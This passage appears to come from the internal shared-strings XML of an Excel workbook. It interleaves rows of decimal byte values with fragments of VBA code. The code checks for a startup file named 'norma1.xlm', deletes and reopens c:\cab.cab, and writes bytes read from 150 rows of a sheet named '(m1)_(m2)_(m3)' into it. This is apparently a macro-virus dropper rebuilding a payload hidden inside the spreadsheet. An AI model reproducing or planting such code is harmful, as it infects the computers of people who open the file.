179 80 146 11 86 151 137 156 36 24 99 63 188 201 28 251 208 21 55 99 175 123 37 39 121 168 125 144 225 223 87 96 78 21 65 189 197 132 232 6 165 223 174 92 24 13 76 37 25 78 35 201 152 138 216 246 142 35 25 31 246 54 129 22 41 215 48 238 145 127 133 55 158 158 116 85 80 186 189 189 128 68 0 43 184 11 53 75 223 91 8 49 158 228 150 7 141 50 146 87 141 60 251 33 </t>
  </si>
  <si>
    <t xml:space="preserve">226 78 31 64 1 62 217 123 64 46 65 27 132 160 50 161 67 21 60 145 208 13 111 84 250 239 134 55 42 61 169 89 223 33 222 168 107 35 219 24 57 127 32 50 113 64 206 138 156 112 170 1 190 125 191 145 186 66 242 189 1 202 46 146 208 190 155 73 104 73 241 51 171 2 206 177 255 148 94 167 206 106 232 27 31 158 31 87 206 9 74 92 200 201 184 87 82 73 130 7 82 46 242 196 75 115 65 247 74 51 131 122 151 100 1 253 224 247 193 41 66 240 207 164 1 25 223 200 244 119 249 217 100 47 164 2 255 76 138 230 157 41 10 234 14 37 44 80 232 164 244 64 178 215 34 223 151 236 173 144 22 116 121 172 165 185 82 129 94 37 128 5 50 177 141 244 128 55 69 10 157 254 178 21 214 92 51 112 67 192 150 133 106 35 104 139 102 222 114 135 25 68 67 214 58 119 66 206 159 10 132 170 205 136 201 107 201 129 169 93 70 206 177 18 158 253 184 142 228 142 35 183 18 122 25 84 59 70 215 166 98 149 43 88 35 87 129 204 35 69 84 225 180 148 19 249 78 174 204 242 172 102 17 47 119 130 18 129 183 77 169 94 129 25 116 39 212 170 148 93 121 207 72 80 132 46 170 20 226 51 185 198 82 155 148 215 153 93 174 123 133 17 82 127 175 95 13 249 73 33 96 120 34 171 114 229 44 197 43 88 180 134 254 108 91 57 108 162 181 154 188 0 110 204 171 135 232 201 44 68 188 46 91 132 167 114 37 60 70 73 235 204 124 160 66 186 161 203 171 131 124 110 132 109 80 94 121 103 217 109 86 109 169 59 204 203 121 145 176 158 43 91 251 179 115 181 194 16 29 210 73 42 81 109 124 156 224 201 140 196 146 115 129 126 32 201 126 160 28 108 91 19 64 186 18 240 156 213 227 1 38 45 157 89 197 97 30 114 51 200 115 254 82 70 241 166 145 16 72 22 253 84 179 3 66 105 51 7 63 248 4 96 52 179 228 149 34 175 239 80 153 82 6 74 12 163 144 201 55 117 151 12 208 198 0 155 25 8 134 232 198 213 107 134 225 16 121 54 177 75 61 127 217 54 82 77 228 47 1 0 198 201 83 53 232 94 209 161 174 249 0 80 </t>
  </si>
  <si>
    <t xml:space="preserve">58 23 144 28 65 46 125 225 117 147 134 69 200 246 42 73 63 99 223 77 187 71 91 110 64 89 38 93 202 23 172 123 37 65 105 253 188 161 217 73 136 42 36 68 125 195 176 248 230 37 100 64 36 3 115 141 129 232 217 173 50 177 117 78 53 200 48 43 137 198 140 177 3 169 173 182 107 251 246 179 218 231 102 94 93 99 38 214 129 96 107 43 164 214 163 36 181 134 164 183 52 54 153 244 218 147 101 183 65 126 29 240 227 15 11 205 130 65 230 167 100 169 109 132 243 10 13 209 20 1 171 43 72 85 48 12 249 196 215 178 239 28 63 126 163 128 120 2 39 202 38 101 194 149 24 40 0 234 251 179 151 115 205 34 161 158 231 92 103 209 62 97 117 35 171 202 99 97 70 109 100 67 116 77 0 175 51 235 73 119 31 228 211 109 91 81 144 111 26 239 229 104 153 43 46 103 71 230 16 83 200 70 27 57 52 92 252 235 100 47 163 214 167 164 165 232 12 250 48 241 7 171 242 201 66 228 120 198 172 27 126 195 70 164 37 104 200 125 170 117 81 228 142 92 153 209 189 169 59 181 175 146 189 17 121 206 117 149 238 8 201 222 149 112 154 146 57 208 168 145 55 224 45 89 206 131 241 147 226 21 5 217 232 105 153 187 185 54 53 242 15 240 90 156 96 122 201 119 153 254 63 85 121 101 193 129 33 146 71 233 242 24 126 252 170 201 129 55 45 47 64 229 28 212 32 196 24 91 243 136 125 1 41 156 7 72 41 183 57 181 18 130 158 38 43 170 96 133 145 249 194 50 200 215 247 217 208 70 195 223 89 193 223 73 12 42 47 36 7 27 199 192 43 249 194 226 229 150 122 211 64 50 148 21 76 194 208 121 242 149 164 26 28 221 202 49 136 30 228 99 137 235 44 72 71 173 79 119 101 151 110 151 230 149 182 72 246 210 125 246 232 34 144 224 91 52 4 22 141 124 0 56 65 107 220 91 57 196 0 79 88 66 244 61 93 229 116 249 29 125 246 142 79 128 93 247 47 205 180 213 254 139 184 146 218 252 120 139 180 77 193 197 146 87 193 115 165 219 21 60 75 42 170 176 71 95 37 101 70 125 218 30 61 4 15 3 222 52 241 128 202 81 </t>
  </si>
  <si>
    <t>cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t xml:space="preserve">167 246 51 99 240 201 233 131 130 246 47 201 132 71 14 43 71 61 218 15 146 9 139 220 170 156 191 170 92 72 43 71 45 237 39 72 53 162 29 56 76 156 122 116 80 174 203 27 28 105 33 74 128 239 147 42 42 164 229 10 206 147 230 40 56 75 246 36 223 141 203 238 200 113 207 72 13 76 175 174 79 201 203 51 110 183 253 130 254 142 174 143 148 102 134 111 156 28 62 65 254 189 107 100 49 12 195 82 41 219 117 122 100 46 60 71 142 71 70 102 3 108 126 17 144 12 39 13 110 232 187 55 194 141 15 130 67 112 191 23 102 161 188 157 135 188 14 221 122 16 116 69 221 195 171 91 88 181 80 221 194 169 91 138 212 10 243 27 14 202 39 5 8 84 231 174 207 93 73 87 220 253 31 193 253 245 104 129 241 165 240 50 178 187 143 75 249 201 117 188 34 229 122 148 1 214 221 219 118 81 251 14 42 81 52 17 165 66 206 196 103 22 92 144 130 50 5 217 204 250 196 110 126 97 44 205 118 95 145 10 209 184 251 191 129 223 13 130 174 238 102 213 221 188 186 155 83 151 171 187 139 80 191 81 92 147 162 131 208 75 34 4 68 118 123 135 147 216 196 22 46 122 214 222 145 79 110 242 178 85 230 149 109 28 56 177 45 35 54 99 0 244 57 73 244 217 246 91 194 77 21 40 36 175 26 207 168 130 37 89 84 116 208 152 173 104 37 21 83 37 252 50 67 1 247 177 112 126 172 100 125 241 80 172 228 39 195 80 54 41 183 82 202 255 180 247 53 80 81 92 89 194 213 116 129 5 52 118 43 16 209 104 210 70 204 196 33 49 196 246 7 166 197 116 11 173 128 160 141 45 221 33 138 74 164 13 116 16 152 166 74 193 129 164 73 193 124 20 149 90 157 196 179 155 61 51 155 9 209 153 117 146 239 59 155 179 153 207 207 153 100 147 198 206 128 154 108 98 116 39 58 154 47 226 140 187 83 78 185 9 70 3 173 33 212 119 239 171 106 108 147 56 51 187 103 206 126 231 236 225 157 243 120 127 247 189 119 223 223 125 247 222 119 139 30 48 149 114 163 34 37 46 217 0 48 5 176 188 97 36 24 152 224 113 1 155 11 246 198 101 117 98 </t>
  </si>
  <si>
    <t>If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</t>
  </si>
  <si>
    <t xml:space="preserve">86 117 193 15 226 178 240 93 64 41 45 120 46 46 11 53 236 202 178 2 41 46 235 105 204 202 46 216 19 151 133 58 15 101 90 193 179 152 149 162 101 245 162 0 75 16 9 48 234 169 42 129 68 171 54 43 12 14 189 2 114 224 136 236 199 49 162 206 58 25 229 218 204 197 64 181 64 64 17 55 100 211 98 154 27 192 243 51 81 32 244 30 198 191 44 142 22 198 138 113 62 108 178 15 180 208 249 22 238 115 201 84 178 89 50 73 152 11 39 24 178 88 32 123 17 143 237 92 254 156 131 132 182 114 137 242 124 224 132 196 37 168 121 178 169 189 73 223 137 176 211 151 23 176 134 213 94 249 159 81 111 37 177 73 6 69 150 232 127 194 219 196 45 223 53 162 170 226 112 149 253 170 176 4 245 82 32 178 38 203 125 255 142 123 161 0 91 200 187 155 205 175 244 201 207 101 225 67 85 149 43 244 112 1 123 79 165 124 233 115 85 181 71 170 132 36 2 30 68 112 159 186 84 70 243 207 42 32 248 85 198 47 243 238 230 142 85 171 4 9 249 135 88 46 204 193 184 112 215 150 205 131 137 7 0 83 60 14 27 117 34 113 11 246 143 3 71 249 230 16 192 214 209 0 227 245 168 153 121 48 79 125 168 82 19 150 28 197 77 50 158 151 197 38 136 81 201 21 117 75 174 49 183 199 227 147 203 9 79 129 212 71 162 123 220 114 201 231 56 40 254 237 44 251 85 192 144 145 79 92 6 12 98 240 162 11 128 190 239 246 250 228 25 164 214 24 255 118 70 177 64 52 113 91 54 239 71 85 156 70 189 196 114 96 66 50 60 94 126 46 37 114 22 164 96 131 4 107 88 200 110 149 101 132 101 112 144 132 14 83 40 239 30 174 168 215 109 112 132 110 220 195 46 232 58 201 206 55 31 58 57 242 116 77 155 131 162 89 147 106 232 30 97 147 122 45 61 119 172 114 144 248 175 73 92 121 143 36 232 208 189 212 42 108 96 149 67 41 36 57 137 164 184 215 226 48 31 58 59 194 199 55 146 216 155 213 115 215 42 232 197 202 38 119 33 151 117 35 153 123 183 235 36 103 44 86 24 210 212 118 21 216 195 44 42 148 71 153 187 134 0 207 </t>
  </si>
  <si>
    <t>fso.delete cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">94 11 194 38 34 156 17 40 60 201 199 131 21 143 188 88 153 161 38 12 186 80 99 79 217 206 133 242 54 113 180 163 80 25 69 148 238 31 137 24 184 249 168 123 202 98 211 66 173 134 123 36 183 129 163 197 35 138 81 0 209 25 200 249 201 252 202 44 243 190 35 66 101 214 7 138 120 106 13 112 126 83 11 17 145 129 164 77 171 84 195 26 238 106 175 5 240 44 229 59 178 40 46 5 81 121 24 80 97 191 131 218 103 118 33 0 206 140 27 98 146 54 63 218 220 152 227 38 208 8 185 170 193 113 233 17 32 143 177 9 83 13 151 102 96 82 101 141 252 183 96 57 50 128 254 169 84 117 164 162 162 239 226 46 36 129 226 3 101 91 113 55 217 206 1 37 132 141 202 217 212 95 139 195 246 171 44 28 95 132 192 209 42 247 169 153 197 200 67 68 237 95 152 187 254 128 87 3 41 195 39 151 75 248 34 202 71 13 230 110 36 26 176 135 76 90 125 115 215 17 124 128 203 191 75 28 96 167 58 28 219 243 179 184 235 90 240 89 206 128 88 80 4 205 125 16 245 120 28 30 143 219 235 241 8 69 217 139 213 211 162 108 87 216 69 149 242 161 207 180 35 83 148 109 97 231 121 60 149 168 198 206 6 40 245 52 112 171 83 137 46 187 229 15 120 78 54 101 91 128 121 179 120 213 76 7 162 23 81 60 124 52 129 43 179 127 129 36 35 134 49 187 60 239 110 113 16 136 121 94 22 247 5 254 25 201 25 116 136 114 165 188 238 51 253 56 115 180 109 68 73 173 244 121 229 41 159 146 219 223 167 102 46 199 218 3 200 40 33 229 70 65 238 114 17 170 115 235 112 70 228 12 173 42 8 102 76 224 78 249 239 46 33 50 75 144 165 24 36 108 155 21 181 136 223 71 72 251 112 203 172 16 10 52 83 213 129 85 137 41 125 8 195 15 48 137 88 166 252 86 130 17 2 127 182 9 250 218 14 188 232 74 216 117 191 210 94 167 139 186 195 230 174 95 96 60 87 170 163 15 83 12 54 37 205 94 216 158 32 14 231 19 89 168 99 253 91 7 118 35 63 140 248 116 93 33 143 65 108 30 175 245 47 76 145 122 72 247 253 45 89 161 </t>
  </si>
  <si>
    <t>open cabfile for binary access write as #1</t>
  </si>
  <si>
    <t xml:space="preserve">173 208 61 163 14 56 18 83 68 51 31 102 58 251 73 231 23 97 87 107 45 181 191 174 36 137 36 102 131 125 243 228 42 209 136 178 223 210 222 114 106 164 223 192 46 4 94 134 75 5 44 41 77 177 120 151 56 40 190 255 85 149 148 152 42 48 0 223 83 76 175 118 225 155 249 120 251 47 109 231 180 193 46 63 163 74 139 207 112 229 221 231 6 86 209 157 92 98 96 228 17 37 69 140 20 19 153 47 252 57 52 188 129 44 20 175 170 236 12 223 68 55 38 162 158 18 86 224 130 38 133 214 210 14 197 204 71 141 112 56 214 210 140 66 195 223 80 33 255 133 177 253 135 42 65 92 205 116 35 83 77 158 63 139 34 182 112 128 66 17 187 14 153 18 243 190 48 244 81 75 90 221 143 114 51 155 41 179 70 242 64 98 142 9 210 91 241 89 35 28 129 91 55 242 46 81 12 250 42 81 178 168 123 49 23 74 225 190 62 49 151 162 170 225 228 136 255 10 87 80 89 54 61 234 164 147 0 187 195 120 56 88 51 44 23 3 23 147 69 72 56 140 66 63 190 65 138 184 176 129 241 186 131 208 64 173 186 4 149 15 250 99 10 148 88 225 198 23 155 77 252 184 202 46 4 1 32 155 189 79 90 188 83 52 189 38 148 129 140 80 108 226 219 95 163 41 110 122 157 1 121 131 162 215 24 25 63 35 80 55 188 198 40 145 218 61 137 148 38 215 32 55 110 11 215 138 105 152 238 108 163 177 35 206 34 86 152 196 245 166 252 10 134 75 36 184 69 60 21 175 215 194 101 169 164 232 17 96 103 133 53 140 80 72 11 79 152 170 54 30 161 169 119 223 245 22 46 202 125 164 48 55 151 240 246 12 14 125 76 172 54 1 225 30 117 144 65 154 187 241 82 23 224 194 112 161 150 28 110 6 161 112 76 108 49 137 223 99 112 4 53 146 105 39 223 190 135 166 88 151 183 82 122 194 162 110 216 67 87 111 134 22 82 195 172 173 117 57 64 121 228 159 17 158 154 134 82 175 71 254 152 36 24 168 22 48 136 69 123 24 185 6 31 215 232 61 66 161 9 234 50 80 1 138 196 197 123 148 62 242 5 136 50 155 140 68 201 196 198 3 170 71 </t>
  </si>
  <si>
    <t>For i = 1 To 150</t>
  </si>
  <si>
    <t xml:space="preserve">126 65 171 95 77 178 99 139 82 9 171 194 136 11 68 231 108 183 232 204 114 203 109 58 16 140 176 15 95 117 128 64 177 105 176 226 223 230 11 138 65 50 51 112 115 235 198 208 208 1 174 106 170 79 6 82 86 165 75 156 184 233 244 167 100 242 14 129 92 166 88 201 216 142 29 110 133 233 179 91 216 84 56 65 206 2 84 209 180 95 241 138 87 64 132 176 255 53 22 153 187 103 3 104 172 51 115 151 76 116 61 92 154 222 161 185 235 52 46 212 13 236 213 220 117 133 188 50 108 2 36 201 197 237 6 89 130 220 220 80 33 93 207 223 183 13 164 84 217 103 70 9 82 203 242 185 165 127 194 80 94 4 187 218 81 197 71 151 239 92 160 149 184 229 187 81 165 18 213 82 188 108 15 24 141 209 186 189 208 130 79 254 60 131 72 202 82 247 86 100 154 89 210 170 193 140 221 99 134 207 45 211 19 137 186 102 82 122 117 42 108 183 67 237 48 38 45 219 45 95 128 156 58 11 240 170 58 92 49 129 75 34 45 223 191 69 185 87 114 49 18 169 128 218 134 165 242 179 102 242 226 179 52 112 77 59 219 110 237 81 98 243 177 72 157 3 70 123 171 254 10 14 101 59 36 56 67 132 159 207 66 132 226 231 183 98 16 48 236 111 38 244 180 14 254 226 167 31 143 68 250 176 64 50 133 250 218 73 216 3 196 45 3 25 194 28 183 169 243 6 126 31 18 156 194 135 51 20 25 78 50 217 204 25 98 165 9 223 144 188 162 211 34 126 150 243 93 147 248 232 24 127 100 204 215 255 137 89 124 79 220 61 86 127 140 134 149 94 35 116 140 73 207 24 138 0 51 161 250 154 80 62 44 154 210 129 238 9 229 81 238 169 254 235 116 224 225 146 45 66 185 201 254 254 78 35 242 0 101 233 180 189 44 157 225 138 129 15 231 175 91 91 102 163 38 34 116 234 83 169 204 64 143 158 158 219 254 106 209 120 50 151 3 189 206 205 87 178 249 254 33 189 24 160 117 136 55 94 69 29 29 0 37 33 80 27 13 45 50 98 123 58 45 144 40 13 81 198 8 162 95 27 3 200 136 95 244 171 244 58 94 125 120 167 49 240 240 22 96 216 248 11 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>hv</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">128 215 101 115 247 139 40 210 194 57 45 31 35 24 10 149 209 146 71 237 199 1 205 157 137 2 140 249 184 177 122 76 252 2 26 192 234 246 27 59 19 196 27 246 247 217 39 196 242 168 88 65 219 43 226 176 255 37 65 239 15 4 183 147 115 55 220 196 126 26 193 94 47 142 97 127 114 238 190 91 176 175 160 73 147 140 88 66 11 165 90 156 22 75 24 161 148 17 43 163 124 199 101 138 75 206 239 48 153 187 4 164 123 229 195 146 233 122 12 18 227 0 38 0 124 41 45 64 11 165 180 189 148 225 182 245 150 77 161 121 213 218 83 110 30 239 239 129 120 203 252 80 135 153 226 166 190 142 136 136 239 159 82 160 219 228 153 19 41 169 232 213 162 228 44 101 1 1 178 72 235 134 72 137 6 85 69 67 58 182 58 93 4 239 228 60 17 38 213 53 44 204 18 54 165 143 169 32 60 221 192 243 143 219 14 175 219 243 68 146 106 64 125 98 65 221 86 124 208 54 27 139 77 175 83 32 225 214 161 44 234 169 0 22 133 148 147 42 250 228 36 187 25 146 212 107 58 44 252 129 30 236 76 3 130 244 120 113 161 22 45 182 132 218 10 97 78 248 173 244 56 201 225 91 25 149 107 240 192 129 104 54 169 167 73 150 218 108 185 245 17 153 108 122 49 147 108 121 58 212 63 148 32 30 37 128 57 71 165 178 105 151 43 164 226 140 10 183 108 153 78 88 109 184 23 212 52 132 183 39 34 200 78 35 47 103 136 105 88 85 72 195 195 164 160 90 123 63 22 9 75 16 217 152 238 1 142 74 92 55 30 47 116 228 147 150 63 173 25 180 72 197 51 248 11 195 112 46 96 171 149 192 166 233 152 202 191 167 158 250 132 47 143 170 2 119 77 177 192 54 1 49 205 54 114 74 134 36 92 19 125 216 147 120 198 126 94 168 102 90 102 138 107 104 209 62 175 60 58 111 60 245 125 46 149 143 100 216 171 199 160 32 248 123 8 185 54 241 172 253 12 130 101 222 2 150 8 96 202 191 217 207 112 85 0 212 50 141 255 30 3 162 22 228 1 164 242 239 88 239 222 88 189 52 82 70 224 63 1 248 169 114 30 218 71 157 233 62 7 133 108 134 </t>
  </si>
  <si>
    <t>n=1</t>
  </si>
  <si>
    <t xml:space="preserve">71 62 139 22 41 226 26 139 96 16 11 45 124 158 74 212 179 102 200 20 230 16 44 11 45 162 133 191 161 10 149 99 108 134 248 204 94 92 54 177 125 111 81 12 145 101 162 150 213 92 52 175 50 58 143 187 134 166 11 82 113 81 234 135 34 119 141 155 33 254 0 101 98 213 53 6 133 124 63 45 142 207 203 79 61 205 94 18 225 92 30 183 169 26 113 137 17 150 242 107 98 25 180 251 30 151 166 119 19 176 66 39 91 186 143 181 39 126 112 97 181 50 42 2 192 134 235 180 152 146 3 244 231 10 208 158 254 113 122 45 63 254 240 147 112 240 55 219 71 205 93 168 12 208 15 73 13 28 144 142 156 184 19 49 38 181 231 209 163 167 132 234 203 243 54 245 20 9 224 199 205 92 30 218 218 148 95 158 155 170 60 20 127 46 8 172 244 12 217 161 163 167 230 206 28 55 67 53 46 85 7 94 67 195 22 129 40 28 224 221 52 223 17 165 144 42 193 121 221 205 0 65 50 119 237 35 231 248 154 216 126 133 150 76 87 132 221 244 55 28 225 218 222 178 36 154 31 135 35 156 218 177 96 188 63 212 145 74 245 64 14 151 74 142 162 248 222 169 79 147 237 19 81 192 39 185 189 167 72 121 48 14 48 77 90 27 59 182 201 223 163 17 227 55 8 182 144 253 38 201 254 36 121 25 144 26 52 130 18 82 132 178 105 99 104 36 20 21 185 97 227 7 210 90 3 102 45 26 131 245 17 167 118 31 147 218 12 194 10 110 150 125 14 110 121 110 58 180 101 39 135 148 155 162 223 53 144 35 48 210 74 90 83 60 147 35 144 134 247 13 136 67 170 189 159 203 149 138 4 55 218 147 170 75 240 96 248 98 231 146 133 115 105 31 100 107 120 237 114 34 23 152 94 27 163 117 111 59 97 129 25 56 69 90 5 105 113 167 118 215 217 7 133 85 22 246 219 1 186 14 37 132 58 188 178 128 225 109 214 75 76 28 90 248 248 226 15 191 45 172 204 224 215 50 170 176 66 120 146 86 19 73 23 171 44 192 204 163 62 137 40 4 200 253 230 19 191 107 17 157 140 237 92 119 24 246 211 16 8 165 98 36 240 112 125 24 119 224 163 82 87 46 </t>
  </si>
  <si>
    <t>m=instr(hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">217 130 174 49 193 193 8 14 26 248 151 82 152 158 47 2 116 255 239 205 198 54 19 97 146 235 144 200 233 184 160 145 6 170 87 159 195 73 255 27 252 228 210 126 99 215 114 105 181 133 47 142 170 124 207 101 184 221 85 169 103 12 130 65 199 216 48 4 48 133 61 99 32 56 9 197 244 96 72 134 12 204 76 196 102 165 226 97 251 241 157 131 168 69 88 103 74 68 181 94 192 176 5 192 4 39 35 149 154 132 98 70 112 210 124 237 11 69 148 240 198 11 184 198 189 171 10 123 143 142 247 119 133 129 244 244 172 45 228 140 201 173 52 33 179 226 59 167 254 0 215 143 155 17 35 154 2 15 152 112 219 73 237 237 229 176 5 152 49 59 195 90 97 100 43 11 90 57 228 204 248 235 233 193 57 252 245 236 93 89 154 202 24 217 228 136 72 255 58 3 64 247 99 70 164 243 58 190 145 5 167 119 94 63 78 197 52 221 12 126 190 154 114 83 201 140 156 60 255 142 106 3 234 246 11 242 204 100 0 46 113 153 180 151 72 86 71 90 102 143 56 104 52 209 9 51 202 21 88 147 28 67 127 212 104 28 208 20 237 27 128 34 172 230 7 172 157 215 137 132 245 43 165 240 77 172 229 149 207 254 78 147 212 108 186 164 38 153 180 135 52 210 168 96 128 102 51 226 5 182 105 208 186 241 67 69 238 255 125 162 120 94 179 117 196 231 1 175 246 60 224 107 89 255 205 175 3 252 242 135 84 110 169 206 123 146 7 14 238 46 94 166 88 75 49 203 20 115 233 158 192 53 133 241 4 62 87 140 158 192 136 154 217 138 2 216 20 97 118 174 45 188 241 118 202 127 50 229 94 205 28 199 215 82 25 103 137 179 124 66 151 62 133 216 213 24 216 101 64 106 217 69 49 86 251 110 91 56 231 40 107 41 97 153 18 46 221 141 61 187 177 103 247 205 158 121 83 174 122 123 163 164 120 59 163 217 226 81 126 232 110 24 239 132 149 81 63 109 144 232 126 214 40 82 145 111 170 174 91 157 250 204 255 192 102 103 240 227 67 226 199 187 210 110 121 78 181 169 144 187 235 219 246 57 228 213 53 205 35 95 142 130 56 18 173 234 86 185 28 111 128 137 </t>
  </si>
  <si>
    <t>do while m&gt;0</t>
  </si>
  <si>
    <t xml:space="preserve">103 85 197 40 100 222 195 23 224 19 47 197 206 244 202 231 117 195 215 12 229 23 112 137 251 228 99 154 113 158 102 28 10 3 138 122 125 1 163 77 221 172 219 162 22 197 217 162 62 56 226 48 241 108 154 91 174 252 23 221 4 213 176 154 31 207 104 159 65 96 212 197 175 202 63 248 141 170 146 68 21 159 253 42 21 51 65 125 3 27 143 104 186 109 114 114 101 225 2 42 32 97 113 186 195 112 172 216 52 190 196 196 12 58 201 35 171 50 13 18 180 228 204 128 2 200 66 177 6 200 4 95 67 195 70 139 155 213 160 17 56 230 175 76 108 47 76 44 63 228 136 244 13 239 34 226 184 25 31 171 213 19 56 90 26 197 228 24 143 61 27 120 67 143 237 156 119 164 63 228 27 116 93 52 161 168 88 45 179 201 112 171 12 184 84 139 146 26 242 171 212 160 235 50 10 107 135 145 200 116 31 229 166 141 252 202 193 49 249 137 76 43 8 227 116 168 92 13 5 140 98 255 230 121 3 57 17 246 129 98 118 110 49 155 121 243 12 10 115 200 251 234 252 4 124 143 184 6 25 97 197 162 69 28 104 73 123 141 80 7 151 133 143 90 216 123 249 168 149 205 226 163 185 108 10 31 117 112 175 11 220 176 146 57 232 26 198 113 163 73 233 48 17 36 141 66 245 240 47 169 41 136 14 77 81 243 142 191 69 78 243 209 167 150 128 48 254 14 251 109 96 148 231 116 94 71 213 22 187 28 66 35 10 192 141 32 244 12 186 162 164 157 101 16 65 109 176 178 80 224 162 202 2 0 1 145 156 157 5 33 8 203 108 178 253 56 59 245 210 10 13 30 101 117 196 49 170 105 66 77 111 226 83 73 247 32 155 46 166 61 15 99 26 253 96 94 121 6 204 27 217 140 7 29 108 74 39 62 114 194 124 140 24 70 222 182 176 9 169 163 7 173 44 67 50 25 37 229 160 133 77 34 113 139 188 29 173 211 206 240 239 171 246 243 92 250 45 155 30 197 89 101 69 128 242 170 92 84 114 93 116 171 220 176 202 93 35 207 126 237 184 129 135 237 163 236 116 111 76 199 194 221 233 213 108 7 181 71 65 183 252 211 27 184 149 6 47 125 72 84 122 168 </t>
  </si>
  <si>
    <t>ch=CByte(mid(hv,n,m-n))</t>
  </si>
  <si>
    <t xml:space="preserve">119 41 87 29 74 50 234 93 112 153 24 144 222 159 130 190 171 122 93 0 118 85 124 199 100 208 40 79 143 43 53 158 248 132 252 169 197 61 69 15 209 92 235 193 16 203 142 184 76 9 108 99 32 1 101 247 123 126 71 212 107 176 223 5 215 48 55 181 147 152 152 225 251 3 91 174 60 28 242 167 83 146 43 61 96 112 123 100 195 16 1 4 28 239 8 117 164 207 66 227 182 97 143 220 159 18 179 84 158 142 234 25 143 124 242 183 177 246 56 147 71 254 171 15 1 55 124 50 152 137 204 4 108 51 151 137 97 83 197 41 161 178 92 218 170 61 109 146 203 67 179 111 66 195 76 70 9 72 7 200 63 128 16 85 60 66 190 209 126 35 81 233 244 26 156 93 97 214 174 37 185 43 162 225 151 234 248 248 147 198 19 252 176 106 59 2 164 253 103 148 193 208 201 202 162 115 12 192 230 117 93 100 103 253 12 110 69 138 157 138 246 204 42 155 160 252 179 212 166 42 105 82 219 184 194 72 109 95 42 70 169 109 12 58 48 233 237 207 236 157 230 236 58 201 214 246 204 88 173 119 241 137 146 40 204 224 7 105 210 143 104 208 123 2 242 31 235 235 2 192 47 238 26 97 191 53 122 132 244 52 29 67 210 213 160 48 3 53 80 91 34 219 181 200 192 234 4 106 34 177 37 210 163 135 68 111 165 117 159 161 13 207 17 27 30 81 42 253 241 49 46 130 49 102 107 99 76 191 57 70 39 153 181 156 254 136 228 28 159 136 125 57 17 27 211 99 132 82 100 193 101 138 186 180 30 228 100 135 171 236 75 22 195 241 23 56 96 43 3 104 183 121 14 85 198 94 140 157 60 220 3 119 120 126 46 27 228 195 185 112 161 239 196 11 93 114 201 110 216 173 161 173 154 122 165 59 27 121 9 135 45 92 245 214 214 54 200 234 144 13 2 105 240 234 43 47 11 115 106 97 39 154 191 255 41 146 134 142 79 40 115 23 114 191 82 249 167 189 211 186 78 106 86 20 230 67 78 213 124 232 164 253 136 249 127 32 151 19 234 33 10 116 135 242 201 205 38 175 190 34 45 94 47 84 143 245 255 27 253 178 244 194 243 128 81 200 78 137 239 176 247 247 </t>
  </si>
  <si>
    <t>put #1,,ch</t>
  </si>
  <si>
    <t xml:space="preserve">86 24 180 135 11 131 249 208 13 251 224 174 12 96 248 123 159 13 1 0 179 23 155 113 216 7 119 126 238 116 134 242 41 238 95 64 56 224 35 12 223 49 70 7 251 129 165 25 76 44 107 213 52 234 238 253 136 172 60 128 136 29 122 6 234 190 229 128 244 79 126 82 181 31 113 255 137 82 9 13 180 169 64 122 138 241 3 31 195 35 26 134 140 163 0 245 83 193 43 94 98 171 163 1 223 108 84 73 18 230 96 220 22 38 173 189 242 202 43 74 90 254 156 40 16 112 118 170 140 15 186 242 63 226 211 69 88 49 198 108 45 240 14 224 231 35 4 204 234 56 103 25 76 140 234 42 127 117 126 15 153 234 47 111 205 236 34 153 99 156 185 47 187 21 187 142 149 144 150 30 56 0 219 137 189 135 151 105 118 6 47 167 177 166 98 22 111 150 195 52 208 203 200 225 233 228 47 205 224 223 105 24 247 5 28 85 128 170 54 217 47 235 72 147 121 217 143 163 32 131 131 49 108 209 13 130 97 147 74 174 203 94 224 197 17 36 110 43 220 129 155 38 76 216 171 158 174 196 203 227 170 234 176 15 4 175 245 186 62 27 232 198 148 21 182 239 50 143 79 170 188 106 62 148 98 62 20 182 247 239 154 3 210 243 27 4 212 121 216 10 78 252 13 126 158 245 138 248 14 127 193 120 245 229 149 43 123 87 170 93 97 238 196 150 141 1 52 6 6 170 168 46 65 108 180 174 209 170 23 106 122 221 1 131 252 118 50 234 179 32 227 75 132 193 82 239 68 177 87 171 36 87 76 209 97 198 190 14 67 62 130 210 225 22 16 27 206 77 182 176 36 97 151 219 197 105 35 71 12 236 29 218 210 91 122 247 37 98 39 61 123 183 66 3 202 236 145 35 9 172 69 43 178 98 17 180 173 252 46 244 34 22 82 14 167 19 38 224 45 165 68 159 21 62 234 12 206 228 163 143 238 202 136 181 117 52 212 111 237 233 33 45 221 205 71 107 130 233 124 116 247 174 169 177 230 142 134 46 89 149 161 88 99 208 212 155 155 143 69 248 2 124 117 4 41 42 240 165 124 63 154 233 14 38 30 212 159 38 181 39 213 177 93 228 81 114 101 221 71 219 112 121 </t>
  </si>
  <si>
    <t>n=m+1</t>
  </si>
  <si>
    <t xml:space="preserve">246 198 94 95 30 23 151 60 131 223 21 156 64 117 164 250 97 119 120 63 66 178 238 186 176 150 81 247 63 49 220 79 225 162 126 184 159 134 160 15 227 192 115 220 161 158 64 89 158 157 218 71 107 25 137 30 204 65 211 150 152 247 168 153 216 90 140 223 138 183 95 69 114 235 3 41 113 183 215 35 254 6 120 192 140 209 1 35 145 239 179 45 220 20 88 110 174 73 153 219 155 180 170 103 202 234 18 118 62 108 145 5 90 57 167 144 205 192 85 240 191 51 178 105 26 0 148 62 184 134 187 138 74 253 141 155 183 68 52 203 75 118 58 86 53 119 225 99 182 110 139 249 137 86 181 1 10 214 112 55 54 110 214 8 47 161 235 37 236 63 104 164 61 41 70 218 239 224 7 116 18 251 49 208 147 251 129 180 223 165 147 118 147 70 218 185 1 97 134 146 213 249 91 252 103 72 16 155 10 49 138 196 80 242 193 54 109 225 18 54 197 22 22 166 96 251 92 20 16 230 186 99 56 254 231 237 119 159 47 253 102 251 221 87 75 136 189 232 193 82 205 126 247 126 12 195 144 119 25 188 165 244 207 180 223 197 198 255 180 253 46 66 125 179 253 174 94 127 15 4 237 224 89 240 13 224 107 193 111 2 191 1 